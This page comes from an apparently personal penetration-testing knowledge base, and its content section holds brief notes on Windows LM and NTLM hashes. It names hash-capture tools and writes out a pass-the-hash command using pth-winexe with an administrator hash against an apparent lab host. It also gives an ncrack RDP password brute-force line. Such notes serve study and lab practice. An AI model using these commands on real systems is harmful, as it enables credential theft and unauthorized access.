Skip to content

Security Knowledge Base Hashes and Credentials

Security Knowledge Base

Home
Bug hunting
Bug hunting
- Bounties
- Guides
Career
Career
- References
Certifications
Certifications
- Osce
  Osce
  - Preparation
- Oscp
  Oscp
  - Enumeration
  - preparation
  - Lab Setup
  - Notes
  - Practice
  - Tools
  - Cheatsheet
    Cheatsheet
    
    Cheatsheets
    
    Exploits
    
    Share files
    
    TTY
    
    Web
    
    Windows
    
    Enumeration
    Enumeration
    
    Network
    
    Vulnerability
    
    Windows local
Cloud
Cloud
- Aws s3
- Aws
- Azuer
Collections
Collections
Containers
Containers
Crypto
Crypto
- Tools
- z References
Ctf
Ctf
- Practice Resources
- Write-ups
- Hack the box
  Hack the box
  - CronOS
  - Bank
  - Bastard
  - Beep
  - Grandpa
  - Lame
  - Popcorn
  - Bashed[ippsec pending]
    Bashed[ippsec pending]
    
    01 Enumeration
    01 Enumeration
    
    Network
    
    WebServices
    
    02 Exploitation
    02 Exploitation
    
    Phpbash
    
    03 PostExploitation
    03 PostExploitation
    
    Goodies
    
    InfoBreakdown
    InfoBreakdown
    
    05 UsersGroups
    
    ScriptResults
    ScriptResults
    
    LinEnum
    
    04 PrivEscalation
    04 PrivEscalation
    
    PrevEsc
  - Blue
    Blue
    
    01 Enumeration
    01 Enumeration
    
    Network
    
    02 Exploitation
    02 Exploitation
    
    EternalBlue
  - Brainfuck
    Brainfuck
    
    01 Enumeration
    01 Enumeration
    
    Network
    
    WebServices
    
    03 PostExploitation
    03 PostExploitation
    
    Goodies
  - Curling[ippsecpending]
    Curling[ippsecpending]
    
    Log
    
    01 Enumeration
    01 Enumeration
    
    Network
    
    OtherServices
    
    WebServices
    
    02 Exploitation
    02 Exploitation
    
    01 Joomla
    
    02 Binary
    
    03 PostExploitation
    03 PostExploitation
    
    Goodies
    
    InfoBreakdown
    InfoBreakdown
    
    01 Host
    
    02 FileSystem
    
    03 Processes
    
    04 Applications
    
    05 UsersGroups
    
    06 Network
    
    07 ScheduledJobs
    
    ScriptResults
    ScriptResults
    
    LinEnum
  - Granny
    Granny
    
    Log
    
    01 Enumeration
    01 Enumeration
    
    Network
    
    OtherServices
    
    WebServices
    
    03 PostExploitation
    03 PostExploitation
    
    Goodies
    
    InfoBreakdown
    InfoBreakdown
    
    01 Host
    
    02 FileSystem
    
    03 Processes
    
    04 Applications
    
    05 UsersGroups
    
    06 Network
    
    07 ScheduledJobs
    
    ScriptResults
    ScriptResults
    
    LinEnum
  - Irked
    Irked
    
    Log
    
    01 Enumeration
    01 Enumeration
    
    Network
    
    OtherServices
    
    WebServices
    
    02 Exploitation
    02 Exploitation
    
    Unreal
    
    03 PostExploitation
    03 PostExploitation
    
    Goodies
    
    InfoBreakdown
    InfoBreakdown
    
    01 Host
    
    02 FileSystem
    
    03 Processes
    
    04 Applications
    
    05 UsersGroups
    
    06 Network
    
    07 ScheduledJobs
    
    ScriptResults
    ScriptResults
    
    LinEnum
  - Jerry[ippsec pending]
    Jerry[ippsec pending]
    
    01 Enumeration
    01 Enumeration
    
    Network
    
    WebServices
    
    02 Exploitation
    02 Exploitation
    
    Tomcat
    
    03 PostExploitation
    03 PostExploitation
    
    Goodies
    
    InfoBreakdown
    InfoBreakdown
    
    01 Host
  - Sense[ippsecpending]
    Sense[ippsecpending]
    
    Log
    
    01 Enumeration
    01 Enumeration
    
    Network
    
    OtherServices
    
    WebServices
    
    02 Exploitation
    02 Exploitation
    
    Pfsense
    
    03 PostExploitation
    03 PostExploitation
    
    Goodies
    
    InfoBreakdown
    InfoBreakdown
    
    01 Host
    
    02 FileSystem
    
    03 Processes
    
    04 Applications
    
    05 UsersGroups
    
    06 Network
    
    07 ScheduledJobs
    
    ScriptResults
    ScriptResults
    
    LinEnum
  - Silo[ippsecpending]
    Silo[ippsecpending]
    
    Log
    
    01 Enumeration
    01 Enumeration
    
    Network
    
    OtherServices
    
    WebServices
    
    02 Exploitation
    02 Exploitation
    
    Oracle
    
    03 PostExploitation
    03 PostExploitation
    
    Goodies
    
    InfoBreakdown
    InfoBreakdown
    
    01 Host
    
    02 FileSystem
    
    03 Processes
    
    04 Applications
    
    05 UsersGroups
    
    06 Network
    
    07 ScheduledJobs
    
    ScriptResults
    ScriptResults
    
    LinEnum
- Template
  Template
  - Log
  - 01 Enumeration
    01 Enumeration
    
    Network
    
    OtherServices
    
    WebServices
  - 03 PostExploitation
    03 PostExploitation
    
    Goodies
    
    InfoBreakdown
    InfoBreakdown
    
    01 Host
    
    02 FileSystem
    
    03 Processes
    
    04 Applications
    
    05 UsersGroups
    
    06 Network
    
    07 ScheduledJobs
    
    ScriptResults
    ScriptResults
    
    LinEnum
Databases
Databases
- Access
  Access
  - Tools
- Mongodb
  Mongodb
  - 0 cheatsheet
- Mysql
  Mysql
  - Cheatsheet
  - MySQL-Root to System-Root
- Oracle
  Oracle
  - Tools
- Sqlserver
  Sqlserver
Dfir
Dfir
- Cheatsheet
- CTFs
- Important Files
- Tools
- References
Embedded and iot
Embedded and iot
- Cheetshet
- FCC
- Protocols
- Tools
- References
- Scenario
  Scenario
  - Test Conditions
- Specific
  Specific
  - ATMs
  - Automobile
  - Bluetooth
  - Cameras
  - Locks
  - Printers
  - Ships
  - UEFI
- Techniques
  Techniques
  - Glitching
  - Side Channel
Exploits and shellcoding
Exploits and shellcoding
Identity and access management
Identity and access management
- Kerberos
- References
Languages
Languages
- GO
- Java
- Javascript
- NodeJS
- PHP
- Python
- Rails
- Regex
- Rust
Malware
Malware
Network
Network
Os
Os
- Android
  Android
  - Android
- Ios
  Ios
  - IOS
- Linux
  Linux
  - Cheatsheet
  - Important Files / Folders
  - Important issues
  - Kernel Exploitation
  - Privilege Escalation
  - Wildcards
  - Defense
  - Tools
    Tools
    
    Iptables
    
    Netcat (NC)
    
    tcpdump
    
    VI
- Macos
  Macos
  - Defense
- Windows
  Windows
  - Cheatsheet
  - Active Directory
  - Windows API
  - Events
  - HyperV
  - Important Endpoints
  - Important Files
  - Important issues
  - Important Processes
  - Important Registry Locations
  - Kernel Exploitation
  - Privilege Escalation
  - WMI
  - Defense Bypass
  - Defense
  - Tools
  - References
  - Credentials
    Credentials
    
    Hashes and Credentials Hashes and Credentials
    Table of contents
    
    LM hashes
    
    NTLM hashes
    
    Dumping hashes
    
    Capturing Hashes
    
    Responder
    
    Inveigh
    
    Impacket's smbserver.py
    
    Pass the Hash
    
    pth-winexe
    
    RDP
    
    LSASS
    
    References
    
    Using Credentials
  - Powershell
    Powershell
    
    Cheatsheet
    
    Collections
    
    Modules
    
    Resources
Osint
Osint
- Tools
- References
Password attacks
Password attacks
Protocols and ports
Protocols and ports
- Citrix 1494
- DHCP
- DNS 53
- FTP 21
- Finger 79
- HTTP HTTPS 80,443
- IMAP 143,993
- IRC 8067
- LDAP 389
- Memcache
- Modbus 502
- MySQL 3306
- NFS 2049
- NTP 123
- References
- POP3 110
- PPTP L2TP VPN 500,1723
- Portmapper 111
- RDP 3389
- RPC 445
- SIP 5060
- SMB Samba NetBIOS 135 139,445
- SMTP 25
- SNMP 161
- SQL Server 1433,1434
- SSH 22
- TFTP 69
- Telnet 23
- Tor 9001,9030
- VNC 5900
- WebDev
- X11 6000
- Rlogin 513
- References
Reverse engineering
Reverse engineering
- 0 cheatsheet
- Defense
- Practice
- Tools
- References
- Linux
  Linux
  - ELF
  - GDB
  - Lab Setup
- Specific
  Specific
  - ARM
  - C / C++
  - .NET
  - Go
  - Java
  - Mobile App
- Windows
  Windows
  - PE Files
  - Tools
  - VBA
  - Defense
Rf and wireless
Rf and wireless
- Rfid nfc
- RaspberryPi
- SDR
Shellcoding
Shellcoding
- Reverse Shell
- Memorize the 8086 opcodes
Shells
Shells
- C++
- ICMP Shells
- Java
- Linux
- PHP
- Python
Steganography
Steganography
- Tools
Theoretical
Theoretical
- Pentesting Process
Vulnerable
Vulnerable
Web
Web
- Cheatsheet
- Client Side Attacks
- CMS
- Discovery
- Sharepoint
- SSL/TLS
- Defense Bypass
- Defense
- Tools
- References
- Scenario
  Scenario
- Vulnerabilities
  Vulnerabilities
  - Command injection
  - CRLF
  - CSRF
  - LFI / RFI
  - Open Redirect
  - PUT
  - SQL Injection
  - SSRF
  - XSS

Hashes and Credentials

LM hashes

Password longer than 7 is split and each half hashed separately
Passwords are converted into uppercase
No salt
Empty LM hash

AAD3B435B51404EE
AAD3B435B51404EEAAD3B435B51404EE

NTLM hashes

Dumping hashes

Cannot copy SAM when sys is in use

Capturing Hashes

Responder

Inveigh

Impacket's smbserver.py

Pass the Hash

Auth using username and NTLM hash (since NTLM and LM hashes are not salted)

Replace "no password" in dump wih empty LM hash
Copy admins dumped hash (LM:NTML)
export SMBHASH=LM:NTML
pth-winexe -U administrator% //ip cmd

pth-winexe

pth-winexe
-U jeeves/Administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
//10.10.10.63 cmd

RDP

ncrack -v -f --user administrator -P password.txt rdp://ip,CL=1

LSASS

References

Extracting User Password Data with Mimikatz DCSync: https://blog.stealthbits.com/extracting-user-password-data-with-mimikatz-dcsync/
Pwning with Responder – A Pentester’s Guide: https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/